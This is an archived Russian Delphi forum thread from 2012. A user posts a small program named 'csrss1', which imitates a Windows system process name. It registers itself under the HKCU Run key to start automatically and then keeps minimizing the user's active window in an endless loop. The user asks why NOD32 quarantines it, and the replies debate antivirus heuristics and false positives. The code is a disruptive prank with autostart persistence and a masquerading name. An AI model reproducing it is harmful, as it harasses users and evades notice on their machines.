Главная страница
    Top.Mail.Ru    Яндекс.Метрика
Форум: "Прочее";
Текущий архив: 2013.03.22;
Скачать: [xml.tar.bz2];

Вниз

почему если убираешь строки про реестр nod32 ругается   Найти похожие ветки 

 
Jonis_84 ©   (2012-08-11 03:03) [0]

program csrss1;

uses
 Winapi.Windows, Winapi.Messages,
 Vcl.Forms, Registry ;

var des,h:HWnd;
Reg:TRegistry;
opa:TPoint;
Rec:TRect;
begin

reg := TRegistry.Create();//?
reg.RootKey := HKEY_CURRENT_USER;//?
if reg.OpenKey("Software\Microsoft\Windows\CurrentVersion\Run", True) then//?
begin
reg.WriteString( Application.Title, Application.ExeName);//?
reg.CloseKey();//?
end;//?
 while True do
 begin
   des:=GetForegroundWindow;
   ShowWindow(Des,SW_MINIMIZE);
   sleep(3000);


Если убрать добавление записи в реестр Nod шлёт погу в карантин???строчки ему нравятся)))хорошего для системы кажется в них ничего нет)
reg := TRegistry.Create();//?
reg.RootKey := HKEY_CURRENT_USER;//?
if reg.OpenKey("Software\Microsoft\Windows\CurrentVersion\Run", True) then//?
begin
reg.WriteString( Application.Title, Application.ExeName);//?
reg.CloseKey();//?
end;//?

Спасибо!!!


 
Германн ©   (2012-08-11 03:18) [1]

Все вопросы к индусам.


 
Anatoly Podgoretsky ©   (2012-08-11 06:26) [2]

> Jonis_84  (11.08.2012 03:03:00)  [0]

nod32 много о себе думает.


 
Rouse_ ©   (2012-08-11 11:06) [3]

Ложное срабатывание, отправь экзешник с кодом в саппорт нода.


 
Eraser ©   (2012-08-12 01:58) [4]


> Jonis_84 ©   (11.08.12 03:03) 

и правильно срабатывает.
вот ты зачем назвал экзешник csrss1? просто буковки понравились?


 
Германн ©   (2012-08-12 02:33) [5]


>
> > Jonis_84 ©   (11.08.12 03:03)
>
> и правильно срабатывает.
> вот ты зачем назвал экзешник csrss1? просто буковки понравились?
>

А вот этого я и не заметил! Ну есс-но любой антивирусник должен возбудиться на такое имя. Так что "ложное срабатывание" похоже можно дезавуировать.


 
brother ©   (2012-08-12 11:12) [6]

трояновирусописаки вон!


 
Rouse_ ©   (2012-08-12 12:31) [7]


> Ну есс-но любой антивирусник должен возбудиться на такое
> имя.

В топку такие антивирусники, которые вирусы на основании имени детектируют :)


 
wl ©   (2012-08-12 12:41) [8]


> Rouse_ ©   (12.08.12 12:31) [7]

называется как вирус, действует как вирус, и что - "Не верь глазам своим"(с)


 
Rouse_ ©   (2012-08-12 12:46) [9]


> называется как вирус

ненаказуемо ©
вирусы часто называются setup.exe


> действует как вирус

запись в авторан и минимизация текущего активного окна, это вирус? :)
Какие-то безобидные нынче вирусы пошли, или у нас разные понятия о их природе и поведении ;)


 
QAZ   (2012-08-12 15:35) [10]

если уж на то пошло, то вирус это програма внедряющая свой код в другую программу, все остальное это не вирус, чем бы оно не занималось


 
wl ©   (2012-08-12 21:20) [11]

да, простите, излишне обобщил все вредоносное по одним словом


 
Германн ©   (2012-08-13 02:54) [12]


> Rouse_ ©   (12.08.12 12:31) [7]
>
>
> > Ну есс-но любой антивирусник должен возбудиться на такое
> > имя.
>
> В топку такие антивирусники, которые вирусы на основании
> имени детектируют :)
>

Это называется "перестраховка". И не надо сразу её фтопку! :)
В топике может быть представлено что угодно. В реальной ситуации может быть нечто иное.


 
Eraser ©   (2012-08-13 04:38) [13]

Кстати, автор не упомянул, включена ли защита от потенциально опасного ПО, скорее всего включена.


 
Rouse_ ©   (2012-08-13 14:11) [14]


> Это называется "перестраховка"

Это называется идиотизм, если выставялется приговор на основе имени приложения. Я понимаю если бы эвристик обработал или сигнатурный поиск.


 
Anatoly Podgoretsky ©   (2012-08-13 14:26) [15]

> Rouse_  (13.08.2012 14:11:14)  [14]

На основе имени, приводит к тому что не остается незаблокированых файлов


 
Eraser ©   (2012-08-13 15:53) [16]


> Rouse_ ©   (13.08.12 14:11) [14]

это и есть эвристик практически в чистом виде.


 
Rouse_ ©   (2012-08-13 16:12) [17]


> это и есть эвристик практически в чистом виде.

Т.е. ты серьезно считаешь что в наименовании файла таится некая скрытая угроза на которую должен реагировать эвристик?
Я вот почему-то считал всегда что он должен принимать решение на результатах поведенческого анализа, полученного после рапаковки, дизассемблирования тела анализируемого приложения и построения вероятностных графов логики на основе статического анализа и/или логирования выполняемых действий в сэндбоксе :)


 
Rouse_ ©   (2012-08-13 16:15) [18]

Ну а по поводу фтопку я уже говорил, не антивируса собачье дело как у меня исполняемый файл называется, хоть csrss, хоть supervirus - ему это должно быть до балды, он должен принимать решения базирующиеся не на ламерских постулатах, а на основе анализа тела файла ;)


 
Anatoly Podgoretsky ©   (2012-08-13 16:28) [19]

Антивирус недолжен так поступать, а вот дефендер может (crack.exe/keygen.exe), и никакого карантина, а прямой запрос на операцию - удалить/разрешить/карантин/в исключения.


 
Rouse_ ©   (2012-08-13 19:28) [20]


> а вот дефендер может

Дефендер (шоп его приподняло) у меня экзешники без запроса в карантин отправлял. Когда списались с их техническими писаками выяснилось что он так на название последней секции реагировал (там было что-то типа .morfin). Правда это было еще на заре дефендера...


 
Anatoly Podgoretsky ©   (2012-08-13 20:02) [21]

> Rouse_  (13.08.2012 19:28:20)  [20]

Ну сейчас дефендера как такого убили, включив его в состав антивируса, и так
у многих производителей.
У меня несколько раз срабатывал, но советовался со мной.


 
Dennis I. Komarov ©   (2012-08-13 20:30) [22]


> Я вот почему-то считал всегда что он должен принимать решение
> на результатах поведенческого анализа, полученного после
> рапаковки, дизассемблирования тела анализируемого приложения
> и построения вероятностных графов логики на основе статического
> анализа и/или логирования выполняемых действий в сэндбоксе
> :)

Стал ругаться на некую конструкцию if then else... (ну поведение может и было подозрительно - там файлы переименовывались)
Поменял на if then; if not then - не кашерно, но антитварь орать перестала...


 
Rouse_ ©   (2012-08-13 20:42) [23]


> Стал ругаться на некую конструкцию if then else

Это сигнатурный анализ - стандартно :)


 
Давайте будем жрать!   (2012-08-13 20:52) [24]

а название у программки показательное, ага... ещё б антивирь не хватался за киндьжялъ на каждое хоть сколько-то подозрительное действие.


 
Eraser ©   (2012-08-14 20:48) [25]


> Rouse_ ©   (13.08.12 16:12) [17]

эвристика, это то, что выявляется опытным путем, в т.ч. на основе статистики. если 99 программ из 100 с подобным названием и с обращением к этому же ключу реестра являются вредоносными, то закономерно отнести все такие программы к вредоносным.


 
Rouse_ ©   (2012-08-14 20:55) [26]


> Eraser ©   (14.08.12 20:48) [25]
>
> > Rouse_ ©   (13.08.12 16:12) [17]
>
> эвристика, это то, что выявляется опытным путем, в т.ч.
> на основе статистики. если 99 программ из 100 с подобным
> названием и с обращением к этому же ключу реестра являются
> вредоносными, то закономерно отнести все такие программы
> к вредоносным.

Это ты сам придумал? Сие есть статистика, а не эвристика ;)
Я же выше озвучил что большинство зловредов идет под наименованием setup.exe, сетаперы убивать будем прямо с ходу?
Ну и советую хотя-бы почитать технические статьи по реализации эвристических анализаторов. Неплохо до кучи будет изучить утекшие в сеть исходники касперского и AVZ, особенное AVZ - там очень красиво показана вообще реализация детекта на поведенческом анализе.


 
Inovet ©   (2012-08-14 20:59) [27]

> [25] Eraser ©   (14.08.12 20:48)
> эвристика, это то, что выявляется опытным путем, в т.ч.
> на основе статистики.

Это эмпирическое.


 
Eraser ©   (2012-08-14 21:06) [28]


> Rouse_ ©   (14.08.12 20:55) [26]

а что со мной то спорить? ) это с производителями антивирусов спорь.
я ни сколько не фанат такого подхода, наш продукт регулярно попадает под раздачу таких вот эвристик. по шапке и от есета и от каспера получаем регулярно, несмотря на наличие ЭЦП, кстати.


 
Rouse_ ©   (2012-08-14 21:17) [29]


> Eraser ©   (14.08.12 21:06) [28]
> а что со мной то спорить? ) это с производителями антивирусов
> спорь.


Леш, да брось - я не спорю, я просто указываю на немного неверную трактовку некоторых понятий :)


> наш продукт регулярно попадает под раздачу таких вот эвристик.
>  по шапке и от есета и от каспера получаем регулярно, несмотря
> на наличие ЭЦП, кстати.

А вот это достаточно уже серьезно, мы такое прошли года 4 назад приложив некоторое кол-во усилий. Т.е. прямой контакт с разрабами и выявление конкретной причины. У нас были траблы как с антивирусами так и с Wine эмулятором. Как правило, когда пройдешь через решето манагеров и выйдешь напрямую на разработчиков - все проблемы решаются в день-два.


 
Eraser ©   (2012-08-14 22:07) [30]


> Rouse_ ©   (14.08.12 21:17) [29]


> А вот это достаточно уже серьезно, мы такое прошли года
> 4 назад приложив некоторое кол-во усилий. Т.е. прямой контакт
> с разрабами и выявление конкретной причины. У нас были траблы
> как с антивирусами так и с Wine эмулятором. Как правило,
>  когда пройдешь через решето манагеров и выйдешь напрямую
> на разработчиков - все проблемы решаются в день-два.

Дело в том, что в нашем случае это вряд ли спасет. Да и убирают срабатывание из базы обычно довольно оперативно (или наоборот добавляют в базу исключение, не знаю уж как там у них).

А срабатывает не из-за каких-то хитрых конструкций, шифрования кода, защиты от взлома и прочих writeprocessmemory. а по вполне формальным признакам. Т.к. ПО для удаленного администрирования итак относится к потенциально опасному. То за кейлогер примут, то за троян. Из-за каких особенностей ПО принимают за вредоносное - вполне понятно, но поделать с этим ничего нельзя увы, это часть функционала.


 
Rouse_ ©   (2012-08-14 22:32) [31]


> ПО для удаленного администрирования итак относится к потенциально
> опасному.

Дык у нас полноценный админкит присутствует, работающий примерно как у тебя на сайте в профиле. Сработались все-же :)



Страницы: 1 вся ветка

Форум: "Прочее";
Текущий архив: 2013.03.22;
Скачать: [xml.tar.bz2];

Наверх




Память: 0.53 MB
Время: 0.081 c
15-1338971575
Cobalt
2012-06-06 12:32
2013.03.22
Самый лучший сотрудник российского оделения Embarcadero


15-1350040484
Pavia
2012-10-12 15:14
2013.03.22
Видео связь


15-1346298010
boriskb
2012-08-30 07:40
2013.03.22
Помогите выбрать планшетник


15-1345700788
oldman
2012-08-23 09:46
2013.03.22
И хваленый, пресловутый Фишер тут-же согласился на ничью...


15-1352290006
harisma
2012-11-07 16:06
2013.03.22
Компилятор в Делфи





Afrikaans Albanian Arabic Armenian Azerbaijani Basque Belarusian Bulgarian Catalan Chinese (Simplified) Chinese (Traditional) Croatian Czech Danish Dutch English Estonian Filipino Finnish French
Galician Georgian German Greek Haitian Creole Hebrew Hindi Hungarian Icelandic Indonesian Irish Italian Japanese Korean Latvian Lithuanian Macedonian Malay Maltese Norwegian
Persian Polish Portuguese Romanian Russian Serbian Slovak Slovenian Spanish Swahili Swedish Thai Turkish Ukrainian Urdu Vietnamese Welsh Yiddish Bengali Bosnian
Cebuano Esperanto Gujarati Hausa Hmong Igbo Javanese Kannada Khmer Lao Latin Maori Marathi Mongolian Nepali Punjabi Somali Tamil Telugu Yoruba
Zulu
Английский Французский Немецкий Итальянский Португальский Русский Испанский